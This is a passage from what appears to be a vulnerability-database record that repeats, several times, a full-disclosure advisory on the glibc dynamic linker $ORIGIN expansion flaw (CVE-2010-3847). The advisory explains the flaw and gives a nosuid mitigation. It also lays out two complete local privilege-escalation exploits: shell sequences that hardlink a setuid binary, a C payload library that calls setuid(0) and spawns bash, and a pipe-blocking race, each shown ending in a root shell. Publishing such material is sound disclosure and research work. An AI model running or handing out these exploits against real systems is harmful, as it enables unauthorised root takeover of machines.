The following interesting solution for administrators who \ncannot modify their partitioning scheme was suggested to me by Rob Holland \n(@robholland): \n \nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid, \nfor example: \n \n# mount -o bind /tmp /tmp \n# mount -o remount,bind,nosuid /tmp /tmp \n \nBe aware of race conditions at boot via crond/atd/etc, and users with \nreferences to existing directories (man lsof), but this may be an acceptable \nworkaround until a patch is ready for deployment. \n \n(Of course you need to do this everywhere untrusted users can make links to \nsuid/sgid binaries. find(1) is your friend). \n \nIf someone wants to create an init script that would automate this at boot for \ntheir distribution, I'm sure it would be appreciated by other administrators. \n \n------------------- \nSolution \n----------------------- \n \nMajor distributions should be releasing updated glibc packages shortly. \n \n------------------- \nCredit \n----------------------- \n \nThis bug was discovered by Tavis Ormandy. \n \n------------------- \nGreetz \n----------------------- \n \nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, \nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., \nand all my other elite friends and colleagues. \n \nAdditional greetz to the openwall guys who saw this problem coming years ago. \nThey continue to avoid hundreds of security vulnerabilities each year thanks to \ntheir insight into systems security. 
\n \nhttp://www.openwall.com/owl/ \n \n------------------- \nNotes \n----------------------- \n \nThere are several known techniques to exploit dynamic loader bugs for suid \nbinaries, the fexecve() technique listed in the Consequences section above is a \nmodern technique, making use of relatively recent Linux kernel features (it was \nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I \nbelieve Gabriel Campana came up with the same solution independently). \n \nThe classic UNIX technique is a little less elegant, but has the advantage that \nread access is not required for the target binary. It is rather common for \nadministrators to remove read access from suid binaries in order to make \nattackers work a little harder, so I will document it here for reference. \n \nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16 \nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the \nLinux Programmer's Manual), then dup2() it to stderr. Following the dup2(), \nanything written to stderr will block, so you simply execve() and then make the \nloader print some error message, allowing you to reliably win any race \ncondition. \n \nLD_DEBUG has always been a good candidate for getting error messages on \nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to \nsome minor complaints about information leaks, but it can still be used with a \nslight modification (I first learned of this technique from a bugtraq posting \nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281). \n \nThe exploit flow for this alternative attack is a little more complicated, but \nwe can still use the shell to do it (this session is from an FC13 system, \noutput cleaned up for clarity). \n \n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection. 
\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) & \n[1] 26926 \n \n# Now ld.so is blocked on write() in the background trying to say \"invalid \n# debug option\", so we are free to manipulate the filesystem. \n$ rm -rf /tmp/exploit/ \n \n# Put exploit payload in place. \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n \n# Clear the pipe by killing sleep, letting cat drain the contents. This will \n# unblock the target, allowing it to continue. \n$ pkill -n -t $(tty | sed 's#/dev/##') sleep \n-bash: line 99: 26929 Terminated sleep 1h \n \n# And now we can take control of a root shell :-) \n$ fg \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then \nwhile the loader is trying to map lots of memory, you have a good chance of \nwinning any race. I previously found an integer overflow in this feature and \nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc \nmaintainers disagreed and just fixed the overflow. \n \nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html \n \nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the \nnext big loader bug is going to be, it's just not safe to let attackers have \nthat much control over the execution environment of privileged programs. \n \nFinally, some notes on ELF security for newcomers. The following common \nconditions are usually exploitable: \n \n- An empty DT_RPATH, i.e. -Wl,-rpath,\"\" \nThis is a surprisingly common build error, due to variable expansion \nfailing during the build process. \n- A relative, rather than absolute DT_RPATH. \nFor example, -Wl,-rpath,\"lib/foo\". \n \nI'll leave it as an exercise for the interested reader to explain why. Remember \nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths \nfor their dependencies, and so on. 
\n \n------------------- \nReferences \n----------------------- \n \n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual. \n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual. \n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual. \n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0. \n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574 \n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html \n \nYou should subscribe to Linux Weekly News and help support their high standard \nof security journalism. \n \nhttp://lwn.net/ \n \nI have a twitter account where I occasionally comment on security topics. \n \nhttp://twitter.com/taviso \n \nex$$ \n \n-- \n------------------------------------- \ntaviso@cmpxchg8b.com | pgp encrypted mail preferred \n------------------------------------------------------- \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/94955/gnuc-origin.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU C library dynamic linker - $ORIGIN Expansion", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitpack", "title": "GNU C library dynamic linker - $ORIGIN Expansion", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915", "href": "", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). 
$ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. 
*/\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. */\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. 
I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The /proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems 
mounted\nwithout nosuid. The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution 
independently).\n\nThe classic UNIX technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents.
This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. 
Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-07T16:23:31", "description": "", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitdb", "title": "GNU C library dynamic linker - '$ORIGIN' Expansion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2010-3847", "2011-0536", "CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EDB-ID:15274", "href": "https://www.exploit-db.com/exploits/15274", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. 
ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). $ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. 
The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. */\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. 
*/\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. 
End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The /proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems mounted\nwithout nosuid. 
The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution independently).\n\nThe classic UNIX 
technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents.
This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe 